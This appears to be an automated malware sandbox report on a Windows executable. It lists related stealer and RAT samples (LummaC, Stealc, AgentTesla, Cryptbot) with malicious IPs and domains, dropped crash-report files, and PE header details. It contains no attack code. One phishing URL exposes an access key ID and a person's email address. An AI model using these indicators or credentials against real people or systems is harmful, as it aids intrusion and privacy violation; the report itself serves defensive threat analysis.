                                                                                                                                                          • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                          New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • artemis-rat.comartemis-rat.com:443
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          bitbucket.orgjSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.50
                                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          cuddlyready.xyzFBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 193.143.1.9
                                                                                                                                                          fp2e7a.wpc.phicdn.net6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          xWnpPJbKGK.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          1fgVMJOnF0.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 192.229.221.95
                                                                                                                                                          s3-w.us-east-1.amazonaws.comjSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.216.152.124
                                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.136.89
                                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 16.182.101.249
                                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.67.100
                                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.18.140
                                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.203.57
                                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 3.5.16.86
                                                                                                                                                          uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                          • 16.182.37.145
                                                                                                                                                          EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.216.41.233
                                                                                                                                                          https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                          • 52.217.128.241
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          AMAZON-AESUSqlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          NT3kfq4eeE.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          4JpRlHS5uF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          tnMyloge4h.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          L07oVVY21C.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                          • 34.226.108.155
                                                                                                                                                          CLOUDFLARENETUSRef#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 104.26.13.205
                                                                                                                                                          LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.157.254
                                                                                                                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.64.41.3
                                                                                                                                                          jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.66.86
                                                                                                                                                          QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.32.96
                                                                                                                                                          AMAZON-02USjSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.216.152.124
                                                                                                                                                          mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.67.100
                                                                                                                                                          Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.18.140
                                                                                                                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 54.203.164.5
                                                                                                                                                          5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 52.217.203.57
                                                                                                                                                          TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 185.166.143.49
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e12ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 172.67.150.173
                                                                                                                                                          • 185.166.143.48
                                                                                                                                                          • 3.5.29.90
                                                                                                                                                          No context
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):65536
                                                                                                                                                          Entropy (8bit):1.0465936511846248
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:WRgFH8vkFYi9y6sehroI7Jf7QXIDcQvc6QcEVcw3cE/n+HbHg/8BRTf3Oy1oVazl:Yg6v7V600BU/gjudx1fzuiFTZ24IO8r
                                                                                                                                                          MD5:006DF890666C5AC31B4DFAC69807BF67
                                                                                                                                                          SHA1:15C5D5358B1DEE417521D893D400B2CF3503A257
                                                                                                                                                          SHA-256:65DDA0DE32AFDE46BD029B39EE02480649C5E7F4DEE596A40FC0C7B0EDD71669
                                                                                                                                                          SHA-512:9311269D4453A907C6E1D1290FD2C91A01D7A61818E370C68AC88AEB7E1B8FEE56FE289047AED615CF2ECE08F963CEB30B7B020FB3FDFF0DAA4FBA22FAC93D3B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.5.4.3.0.7.4.9.3.1.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.5.4.3.1.8.7.4.3.0.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.c.d.4.c.4.6.-.6.2.6.6.-.4.c.b.7.-.a.c.6.2.-.c.4.f.6.a.3.b.d.9.f.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.2.0.6.a.9.d.-.b.0.7.a.-.4.4.7.3.-.8.c.4.2.-.6.9.d.b.2.9.5.8.f.c.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.J.Q.i.z.Q.6.s.q.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.c.-.0.0.0.1.-.0.0.1.5.-.7.e.e.2.-.5.8.f.c.1.2.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.7.b.a.3.6.f.2.b.2.9.9.e.0.b.8.6.f.2.b.3.e.4.c.5.8.b.1.9.8.4.b.0.0.0.0.f.f.f.f.!.0.0.0.0.0.0.a.4.b.1.4.b.4.e.5.7.4.a.c.6.e.5.c.1.1.3.6.b.0.e.e.9.7.8.9.c.3.c.f.2.6.b.6.1.!.B.J.Q.i.z.Q.6.s.q.T...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 08:17:10 2024, 0x1205a4 type
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):285702
                                                                                                                                                          Entropy (8bit):1.4941912520065337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:hTU/DJtBBA5aQYZrH53P+6eMwBE2VfKXCV2CEWEs+TU9lV4:m/DJd1ZrZWtEIpEWEFTeV4
                                                                                                                                                          MD5:982F5112D1BCFB6AA5F3552BC59A3D2D
                                                                                                                                                          SHA1:D8A7D75DDE5A934C447B8B73FC4D37D0DA8C28D8
                                                                                                                                                          SHA-256:4A2CB7695D19BFA2F69610C1A087563011D207A517BBAB590F1ABF4C5641C560
                                                                                                                                                          SHA-512:76AD5BAD94B154849CE6448212A7DB1302ACDE02831EEB350A6A28DB4AEAE09911E9670F603476F71661C69239F8792644390D0843354F89A80329318FC57842
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:MDMP..a..... .........ig....................................,....'......t...............`.......8...........T............K...............(...........*..............................................................................eJ......H+......GenuineIntel............T.......,...d.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8380
                                                                                                                                                          Entropy (8bit):3.7086190239381964
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:R6l7wVeJ7C6dc6Y2DISUu1EgmfcCprE89b6GC2sfF/+m:R6lXJe6m6YlSUumgmfce6GCVfd
                                                                                                                                                          MD5:BCF8DD003D4E6279DF1DFA66B1479057
                                                                                                                                                          SHA1:5393AC567E8E0FB0E4BAFD86E708A7AF308737ED
                                                                                                                                                          SHA-256:3BDBC976A0ADDC14E2711B2D4339365B23FDFA19434A3CA08B0AF1B9CE6E21B6
                                                                                                                                                          SHA-512:158325DC96D6BE49FFB7DA9304D1332B0A407F258C2E1574F6C0E432323EB25E65471D0E28682338C5C0D8D0D13FD47DE25BFF6602ABFAE0B7953DEF4583CF59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.4.0.<./.P.i.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4624
                                                                                                                                                          Entropy (8bit):4.5169247168383295
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwWl8zsndJg77aI952WpW8VYWYm8M4JdKGFf+q8P6OM0zTYBdd:uIjfn3I7jX7VCJlS9zTYBdd
                                                                                                                                                          MD5:17EF6497E55898EC73E3112689C3CA0F
                                                                                                                                                          SHA1:531086663DA854841122202123CF5CE7D82FFCE1
                                                                                                                                                          SHA-256:ADEB8338573EDB76FB140D61EFE9DBA69D440FCDB9A10030C2D4917644F65B7B
                                                                                                                                                          SHA-512:594C64654D4879139968E650273EC9AE6C80B37484FAF07D993CBFF997C0135AB5FE71002F038E07D06FFFF9E8AF17FC644EF77BE9FEF6E6FE5A8278B5129E1C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643639" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                          Entropy (8bit):4.468635228582377
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:YzZfpi6ceLPx9skLmb0f/ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNgjDH5S:OZHt/ZWOKnMM6bFpuj4
                                                                                                                                                          MD5:E194CA80919150EA2CBDB4492777EABA
                                                                                                                                                          SHA1:09CE615BF178B82DF37F531197BAE3C94F278A59
                                                                                                                                                          SHA-256:B8293A14ADE35D50ED5DADF2DBB1B8F6641EFD025A376EAC8BA6C51BD0BF7100
                                                                                                                                                          SHA-512:EF8E4BF780554603ABFD60FAE9FE2A93B860745C0B09C2CE791355587D2F79960A63B28A9FFBE0FD4EBC250C2EDF3A8FD2D1D66ED14BB91ACFDF166EFB1098CD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~.s..U...............................................................................................................................................................................................................................................................................................................................................e$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Entropy (8bit):6.5349533641355295
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:BJQizQ6sqT.exe
                                                                                                                                                          File size:2'916'352 bytes
                                                                                                                                                          MD5:daed40d82d8d43f2ad0be3fb944c99a3
                                                                                                                                                          SHA1:00a4b14b4e574ac6e5c1136b0ee9789c3cf26b61
                                                                                                                                                          SHA256:ac43fe948b1c2c1039fb007c8ca7da8575b1ffa60b5bcd4de626fc9dc7aa55fa
                                                                                                                                                          SHA512:43acec0e1c5679edaa0851e1f057d08af9d9add671e682137f1ac513c74bc743cd4541aec59107320e865b0d9071154b46deb4fd11c4a3df607e72bb4bc69651
                                                                                                                                                          SSDEEP:49152:eLgrqaZ9jM9dzE7uSwm6fTB6m+Tg2IB+f7iZsyhbsaz6Jkl:gGqaZ9olE7uLm6fd84If7iOibsa+JA
                                                                                                                                                          TLSH:22D538E1E906B1CFD48E56B4906BCD526D6D06B94B2088C7AC6C767EBE63DC011BFC24
                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................P/...........@.........................../.....,.,...@.................................T0..h..
                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                          Entrypoint:0x6f5000
                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:6
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:6
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                          Instruction
                                                                                                                                                          jmp 00007FC0406E5BCAh
                                                                                                                                                          divps xmm5, dqword ptr [eax+eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          jmp 00007FC0406E7BC5h
                                                                                                                                                          add byte ptr [edi], bh
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edx], ah
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edx+ecx], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          push es
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [ebx], cl
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [0000000Ah], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ecx], cl
                                                                                                                                                          add byte ptr [eax], 00000000h
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add eax, 0000000Ah
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], dl
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ebx], cl
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
